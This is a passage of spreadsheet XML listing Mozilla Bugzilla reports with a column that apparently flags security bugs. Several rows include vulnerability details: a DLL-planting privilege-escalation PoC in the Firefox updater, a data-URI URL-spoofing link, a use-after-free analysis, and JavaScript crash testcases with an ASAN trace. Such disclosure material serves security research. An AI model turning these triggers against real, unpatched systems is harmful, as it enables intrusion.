      <c r="Q1217" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1217" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1217" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T1217" t="n">
        <v>1</v>
      </c>
      <c r="U1217" t="n">
        <v>0</v>
      </c>
      <c r="V1217" t="n">
        <v>46</v>
      </c>
      <c r="W1217" t="inlineStr">
        <is>
          <t>The updater component is still vulnerable (see 830134) to a library-based attack. The exe loads the profapi.dll from the update directory, for example while performing an update. That can lead to privilege escalation while updating with the Mozilla Maintenance Service.
I have tested this on win7 pro 32bit and 64bit with Firefox 20.0. 
Steps to reproduce:
1.) Download poc and extract the .dll file.
2.) Copy the updater.exe from the firefox directory to the poc directory
3.) Start the updater.exe
The updater loads the "profapi.dll" and executes system("calc").
The profapi.dll from the system directory should be loaded.</t>
        </is>
      </c>
      <c r="X1217" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" t="n">
        <v>808481</v>
      </c>
      <c r="B1218" t="inlineStr">
        <is>
          <t>2012-11-04 23:24:51 -0800</t>
        </is>
      </c>
      <c r="C1218" t="inlineStr">
        <is>
          <t>"Assertion failure: lifetime-&gt;entry == uint32_t(entryTarget - outerScript-&gt;code),"</t>
        </is>
      </c>
      <c r="D1218" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:27 -0700</t>
        </is>
      </c>
      <c r="E1218" t="n">
        <v>1</v>
      </c>
      <c r="F1218" t="n">
        <v>1</v>
      </c>
      <c r="G1218" t="n">
        <v>3</v>
      </c>
      <c r="H1218" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1218" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1218" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1218" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1218" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1218" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1218" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1218" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q1218" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1218" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1218" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T1218" t="n">
        <v>1</v>
      </c>
      <c r="U1218" t="n">
        <v>0</v>
      </c>
      <c r="V1218" t="n">
        <v>23</v>
      </c>
      <c r="W1218" t="inlineStr">
        <is>
          <t>Created attachment 678222
stack
mjitChunkLimit(35)
eval("\
    0;\
    L: switch(5) {\
        case 1: c:break\
    }\
    while(a);\
")
asserts js debug shell on m-c changeset 2937fd8e35a1 with -a at Assertion failure: lifetime-&gt;entry == uint32_t(entryTarget - outerScript-&gt;code),
Assuming related to bug 747226. s-s and assuming sec-critical because similar previously-found assertions were also s-s.
===
Due to skipped revisions, the first bad revision could be any of:
changeset:   106120:300ac3d58291
user:        David Anderson
date:        Thu Apr 19 15:02:11 2012 -0700
summary:     Enable JITs and type inference by default, and give Ion first chance (bug 724751, r=jandem).
changeset:   106121:de015aff650d
user:        David Anderson
date:        Thu Apr 19 15:02:47 2012 -0700
summary:     Enable IonMonkey in the browser, and introduce an about:config option to pref it off (bug 745390, r=dmandelin).
changeset:   106122:9e64f779b611
user:        David Anderson
date:        Thu Apr 19 16:57:58 2012 -0700
summary:     Disable TypeScript::SetScope (bug 747226, r=bhackett).
changeset:   106123:bc1833f2111e
user:        Christian Holler
date:        Mon Apr 23 17:32:32 2012 +0200
summary:     Bug 747902 - Add --ion, -n and -m flags back for compatibility</t>
        </is>
      </c>
      <c r="X1218" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" t="n">
        <v>1221444</v>
      </c>
      <c r="B1219" t="inlineStr">
        <is>
          <t>2015-11-03 23:05:35 -0800</t>
        </is>
      </c>
      <c r="C1219" t="inlineStr">
        <is>
          <t>Partial URL spoofing using the data URI scheme</t>
        </is>
      </c>
      <c r="D1219" t="inlineStr">
        <is>
          <t>2016-03-10 15:36:38 -0800</t>
        </is>
      </c>
      <c r="E1219" t="n">
        <v>1</v>
      </c>
      <c r="F1219" t="n">
        <v>1</v>
      </c>
      <c r="G1219" t="n">
        <v>3</v>
      </c>
      <c r="H1219" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1219" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1219" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1219" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1219" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1219" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1219" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1219" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q1219" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1219" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1219" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T1219" t="n">
        <v>1</v>
      </c>
      <c r="U1219" t="n">
        <v>0</v>
      </c>
      <c r="V1219" t="n">
        <v>19</v>
      </c>
      <c r="W1219" t="inlineStr">
        <is>
          <t>Created attachment 8682949
ff-spf.html
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Build ID: 20151014143721
Steps to reproduce:
The parser that handles data uri schemes does not consider the 'hash' symbol which could lead to tricking a victim into thinking they're in a trusted website. Please view the attached PoC for a better idea of how an attack scenario would look like.
new URL('data:#;,test'); //This is a valid data url, though logically it only points to 'data:' which is supposed to be blocked from access
new URL('data:#');//"TypeError: data:# is not a valid URL."
So we can trick the browser into forming the second url using this flaw.
PoC:
&lt;a href="data:#q;,&lt;b&gt;qab&lt;/b&gt;&lt;script&gt;location.hash=''&lt;/script&gt;"&gt;click&lt;/a&gt;
Actual results:
We end up in 'data:#' that contains the document from the initial data: url.
Expected results:
The parser should not allow the hash symbol before the ',' character.</t>
        </is>
      </c>
      <c r="X1219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" t="n">
        <v>342447</v>
      </c>
      <c r="B1220" t="inlineStr">
        <is>
          <t>2006-06-22 12:50:33 -0700</t>
        </is>
      </c>
      <c r="C1220" t="inlineStr">
        <is>
          <t>Reconfiguring for clarity (addons.mozilla.org)</t>
        </is>
      </c>
      <c r="D1220" t="inlineStr">
        <is>
          <t>2011-06-26 22:54:48 -0700</t>
        </is>
      </c>
      <c r="E1220" t="n">
        <v>1</v>
      </c>
      <c r="F1220" t="n">
        <v>1</v>
      </c>
      <c r="G1220" t="n">
        <v>7</v>
      </c>
      <c r="H1220" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1220" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1220" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1220" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1220" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1220" t="inlineStr"/>
      <c r="Q1220" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1220" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1220" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1220" t="n">
        <v>1</v>
      </c>
      <c r="U1220" t="n">
        <v>0</v>
      </c>
      <c r="V1220" t="n">
        <v>16</v>
      </c>
      <c r="W1220" t="inlineStr">
        <is>
          <t>We need help restructuring Bugzilla for Mozilla Update.  There are a number of changes we need:
a) Rename Product from "Update" -&gt; "addons.mozilla.org" -- is this possible?
b) Rename Components:
* Web Site -&gt; Public Pages
* Developers -&gt; Developer Pages
* Plugin Listings -&gt; Plugins
* Listings -&gt; Search
c) Add Components:
** Maintenance Scripts
** Search Plugins
** Policy
d) Add Target Milestones:
* 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9, 3.0
We need this ASAP to help organize the mess of bugs we have, and assign TM's that correspond to dates (we'd list those dates somewhere else in case they'd change).
Also, "Update" and a lot of the components were vague and/or confusing so we're just trying to get organized.
If some of these changes are not possible for whatever reason, I apologize.  Seems like they should be doable thoug.  Lastly, thanks -- we appreciate the help.  :)</t>
        </is>
      </c>
      <c r="X1220" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" t="n">
        <v>425177</v>
      </c>
      <c r="B1221" t="inlineStr">
        <is>
          <t>2008-03-26 06:08:08 -0700</t>
        </is>
      </c>
      <c r="C1221" t="inlineStr">
        <is>
          <t>Copy/Paste causes  Line: 11, Char: 10254, Error: Unspecified Error, Code: 0 error message</t>
        </is>
      </c>
      <c r="D1221" t="inlineStr">
        <is>
          <t>2008-08-22 14:07:25 -0700</t>
        </is>
      </c>
      <c r="E1221" t="n">
        <v>1</v>
      </c>
      <c r="F1221" t="n">
        <v>1</v>
      </c>
      <c r="G1221" t="n">
        <v>4</v>
      </c>
      <c r="H1221" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1221" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J1221" t="inlineStr">
        <is>
          <t>Test Cases</t>
        </is>
      </c>
      <c r="K1221" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1221" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1221" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1221" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1221" t="inlineStr"/>
      <c r="Q1221" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1221" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1221" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1221" t="n">
        <v>1</v>
      </c>
      <c r="U1221" t="n">
        <v>0</v>
      </c>
      <c r="V1221" t="n">
        <v>10</v>
      </c>
      <c r="W1221" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
Build Identifier: 2.0
This is by far one of the biggest problems that I've encountered so far while evaluating Testopia 2.0 product.  First, I created a Test Plan. Then I created a new test case for the above plan (it doesn't matter if you select "New Case", or by "Add a new Test Case to selected plan").  What I did is copied a bunch of info from one of my existing test cases in Word format. I filled out not only Action/Expected Results, but also Set Up/Breakdown, and of course selected/filled out the required fields as well. I clicked submit, and got a pop-up confirmation that my test case was successfully created, and if I want to go there. I said no, and proceeded onto creating a second test case.  Then I came back to the first one to make some changes, and to my surprise there was nothing in the Expected Results field.  Everything else, however, seemed to be in place. I thought it was some kind of a glitch, so I tried to copy/paste again, but this time as soon I hit the Submit button, I got the error message: Line 11, Char: 10254, Error: Unspecified Error, Code: 0. I have tried plain text, HTML, RTF, but nothing worked.  I started going back and forth between test cases only to realize that some of the stuff was missing from the other ones as well. In some cases all the fields were empty!!! I thought the problem only had to do with copy/paste, but apparently it is not so. Some of the manually entered information was missing too, and that's after "Test Case was Successfully Updated" message!  I'm not sure if it's a format thing, or a some kind of a character limitation, but this is Major issue that should be addressed as soon as possible, as it causes a loss of data. Please, look into it, and let us know if there is at least a workaround, as I can't seem to find one at this point. Thank you.
Reproducible: Always
Steps to Reproduce:
1. Create a new test plan
2. Create a new test case by copying/pasting into fields from another document.
3. Click Submit.
4. Go to test case, and one (sometimes more) fields will be missing previously entered information.
Actual Results:  
One, or sometimes several of the fields (Expected Results, Breakdown, etc.) would be missing previously entered information after creating a new test case, or updating an existing one.
Expected Results:  
The information should all be there, whether it was copied/pasted from another document, or entered manually.</t>
        </is>
      </c>
      <c r="X1221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" t="n">
        <v>590771</v>
      </c>
      <c r="B1222" t="inlineStr">
        <is>
          <t>2010-08-25 16:22:33 -0700</t>
        </is>
      </c>
      <c r="C1222" t="inlineStr">
        <is>
          <t>nsDOMAttribute MutationObserver Remote Code Execution Vulnerability (ZDI-CAN-898)</t>
        </is>
      </c>
      <c r="D1222" t="inlineStr">
        <is>
          <t>2013-04-04 13:53:36 -0700</t>
        </is>
      </c>
      <c r="E1222" t="n">
        <v>1</v>
      </c>
      <c r="F1222" t="n">
        <v>1</v>
      </c>
      <c r="G1222" t="n">
        <v>3</v>
      </c>
      <c r="H1222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1222" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1222" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1222" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1222" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1222" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1222" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1222" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1222" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1222" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1222" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1222" t="n">
        <v>1</v>
      </c>
      <c r="U1222" t="n">
        <v>0</v>
      </c>
      <c r="V1222" t="n">
        <v>33</v>
      </c>
      <c r="W1222" t="inlineStr">
        <is>
          <t>Created attachment 469260
PoC
ZDI-CAN-898: Mozilla Firefox nsDOMAttribute MutationObserver Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)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application's support of an API used
for element traversal. Due to a particular element not implementing
functionality required by the API, a use-after free vulnerability can be
made to occur. This can be used to achieve code execution under the
context of the application.
The issue occurs within the application's support of the NodeIterator
API that is used for DOM Traversal as outlined in the DOM specification
on w3.org. 
In order to support the node iteration, the application needs to keep
track of modifications to the dom tree in order to update the state of
the iterator. This is done explicitly by a pair of methods called
AddMutationObserver/RemoveMutationObserver. Anytime an element is
created, the observer list will be updated so that a node iterator can
adjust for modified elements.
When adding an element, it will need to update the MutationObserver list
as in the following code.
content/base/src/nsNodeIterator.cpp:185
nsNodeIterator::nsNodeIterator(nsINode *aRoot,
                               PRUint32 aWhatToShow,
                               nsIDOMNodeFilter *aFilter,
                               PRBool aExpandEntityReferences) :
    nsTraversal(aRoot, aWhatToShow, aFilter, aExpandEntityReferences),
    mDetached(PR_FALSE),
    mPointer(mRoot, PR_TRUE)
{
    aRoot-&gt;AddMutationObserver(this);         // XXX
}
nsNodeIterator::~nsNodeIterator()
{
    /* destructor code */
    if (!mDetached &amp;&amp; mRoot)
        mRoot-&gt;RemoveMutationObserver(this);    // XXX
}
AddMutationObserver/RemoveMutationObserver will add the provided element
to a page-global list that can be queried by the NodeIterator.
content/base/src/nsGenericElement.cpp:295
void
nsINode::AddMutationObserver(nsIMutationObserver* aMutationObserver)
{
  nsSlots* slots = GetSlots();
  if (slots) {
slots-&gt;mMutationObservers.AppendElementUnlessExists(aMutationObserver);
  }
}
void
nsINode::RemoveMutationObserver(nsIMutationObserver* aMutationObserver)
{
  nsSlots* slots = GetExistingSlots();
  if (slots) {
    slots-&gt;mMutationObservers.RemoveElement(aMutationObserver);
  }
}
One element however does not update the mutation list. This is the
nsDOMAttribute and is defined in content/base/src/nsDOMAttribute.cpp.
This will allow someone to manipulate the nsDOMAttribute node without
the nsNodeIterator api being informed. This will bypass the type-safety
of the compiler and can lead to code execution.
Version(s)  tested: Mozilla Firefox
Platform(s) tested: Windows XP SP3
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X1222" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" t="n">
        <v>1251398</v>
      </c>
      <c r="B1223" t="inlineStr">
        <is>
          <t>2016-02-25 13:12:07 -0800</t>
        </is>
      </c>
      <c r="C1223" t="inlineStr">
        <is>
          <t>Write spark job to generate JSON data for update orphaning dashboard</t>
        </is>
      </c>
      <c r="D1223" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E1223" t="n">
        <v>1</v>
      </c>
      <c r="F1223" t="n">
        <v>1</v>
      </c>
      <c r="G1223" t="n">
        <v>6</v>
      </c>
      <c r="H1223" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1223" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J1223" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K1223" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1223" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1223" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1223" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1223" t="inlineStr"/>
      <c r="Q1223" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1223" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1223" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1223" t="n">
        <v>1</v>
      </c>
      <c r="U1223" t="n">
        <v>0</v>
      </c>
      <c r="V1223" t="n">
        <v>18</v>
      </c>
      <c r="W1223" t="inlineStr">
        <is>
          <t>To run our update orphaning dashboard (currently at http://people.mozilla.org/~spohl/update-orphaning-dashboard/) we're planning to create weekly reports on our orphaning state using longitudinal datasets. The output file will be a JSON file, stored on S3. Once longitudinal datasets are created automatically every week, this spark job could run as a weekly spark job. For now, the intent is to run this once per week using the most recent longitudinal dataset. Note that currently, new datasets aren't created past 2016-02-12 due to bug 1246137.</t>
        </is>
      </c>
      <c r="X1223" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1224">
      <c r="A1224" t="n">
        <v>1276897</v>
      </c>
      <c r="B1224" t="inlineStr">
        <is>
          <t>2016-05-31 05:05:09 -0700</t>
        </is>
      </c>
      <c r="C1224" t="inlineStr">
        <is>
          <t>Type confusion in nsDisplayList::HitTest</t>
        </is>
      </c>
      <c r="D1224" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:44 -0700</t>
        </is>
      </c>
      <c r="E1224" t="n">
        <v>1</v>
      </c>
      <c r="F1224" t="n">
        <v>1</v>
      </c>
      <c r="G1224" t="n">
        <v>3</v>
      </c>
      <c r="H1224" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1224" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1224" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1224" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L1224" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1224" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1224" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1224" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1224" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q1224" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1224" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1224" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T1224" t="n">
        <v>1</v>
      </c>
      <c r="U1224" t="n">
        <v>0</v>
      </c>
      <c r="V1224" t="n">
        <v>22</v>
      </c>
      <c r="W1224" t="inlineStr">
        <is>
          <t>The following testcase crashes the latest ASAN build of Firefox (buildId 20160523171639).
Testcase (might need a few reloads or a mouse over):
&lt;script&gt;
function start() {
        o37=document.createElement('iframe');
        o122=document.createElement('th');
        o46=document.createElement('iframe');
        o59=document.createElement('input');
        o37.setAttribute('style',"box-shadow:; mix-blend-mode: hard-light; ");
        o528=document.createElement('iframe');
        o122.appendChild(o528);
        o586=document.createElement('tfoot');
        o711=(new DOMParser()).parseFromString(" x&lt;code&gt;&lt;output&gt;a&lt;em&gt;&lt;tt&gt;&lt;noscript&gt;&lt;/code&gt;",'text/html');
        o718=o711.all[6];
        o720=o711.all[8];
        o720.appendChild(o37);
        o718.appendChild(o46);
        o718.appendChild(o59);
        o720.appendChild(o122);
        o720.appendChild(o586);
        o586.innerHTML="&lt;style&gt;@keyframes{{}}* { perspective: 1cm}{:}\n*{ transform-style: preserve-3d;&lt;/style&gt;&lt;style id&gt;*{ outline-style: auto;:; float: left&lt;/style&gt;&lt;/svg&gt;";
        document.replaceChild(o711.documentElement,document.documentElement);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
ASAN detected this as a heap-buffer-overflow before minimising. Probably because an adjacent object was allocated.
=================================================================
==5201==ERROR: AddressSanitizer: use-after-poison on address 0x621000a893de at pc 0x7fae8f81b1a0 bp 0x7fffd50a1ff0 sp 0x7fffd50a1fe8
READ of size 1 at 0x621000a893de thread T0 (Web Content)
    #0 0x7fae8f81b19f in IsTransformSeparator /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4159
    #1 0x7fae8f81b19f in IsLeafOf3DContext /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4165
    #2 0x7fae8f81b19f in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayItem::HitTestState*, nsTArray&lt;nsIFrame*&gt;*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2064
    #3 0x7fae8f819f36 in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayItem::HitTestState*, nsTArray&lt;nsIFrame*&gt;*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2080
    #4 0x7fae8f85a548 in nsDisplayTransform::HitTest(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayItem::HitTestState*, nsTArray&lt;nsIFrame*&gt;*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:6135
    #5 0x7fae8f819f36 in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&amp;, nsDisplayItem::HitTestState*, nsTArray&lt;nsIFrame*&gt;*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2080
    #6 0x7fae8f8ca38c in nsLayoutUtils::GetFramesForArea(nsIFrame*, nsRect const&amp;, nsTArray&lt;nsIFrame*&gt;&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsLayoutUtils.cpp:3122
    #7 0x7fae8f8c99de in nsLayoutUtils::GetFrameForPoint(nsIFrame*, nsPoint, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsLayoutUtils.cpp:3074
    #8 0x7fae8f6fbdeb in mozilla::FindFrameTargetedByInputEvent(mozilla::WidgetGUIEvent*, nsIFrame*, nsPoint const&amp;, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/PositionedEventTargeting.cpp:548
    #9 0x7fae8f96a204 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:7903
    #10 0x7fae8ef8e9bb in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/view/nsViewManager.cpp:814
    #11 0x7fae8ef86fc9 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/view/nsView.cpp:1121
    #12 0x7fae8efd0ffc in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/PuppetWidget.cpp:345
    #13 0x7fae8aea3ef1 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/layers/apz/util/APZCCallbackHelper.cpp:469
    #14 0x7fae8e99a5d2 in mozilla::dom::TabChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&amp;, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:1909
    #15 0x7fae8e99a90c in RecvRealMouseMoveEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:1886
    #16 0x7fae8e99a90c in non-virtual thunk to mozilla::dom::TabChild::RecvRealMouseMoveEvent(mozilla::WidgetMouseEvent const&amp;, mozilla::layers::ScrollableLayerGuid const&amp;, unsigned long const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/ipc/Unified_cpp_dom_ipc1.cpp:1887
    #17 0x7fae8a07345b in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:3015
    #18 0x7fae8a1d75cb in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:6441
    #19 0x7fae8995fc33 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1655
    #20 0x7fae8995c765 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1593
    #21 0x7fae89949fd2 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1560
    #22 0x7fae8996f8d0 in applyImpl&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:707
    #23 0x7fae8996f8d0 in apply&lt;mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:713
    #24 0x7fae8996f8d0 in nsRunnableMethodImpl&lt;bool (mozilla::ipc::MessageChannel::*)(), false, true&gt;::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:741
    #25 0x7fae8997039f in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:477
    #26 0x7fae8997039f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:496
    #27 0x7fae88bdd8db in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1073
    #28 0x7fae88c57e2a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
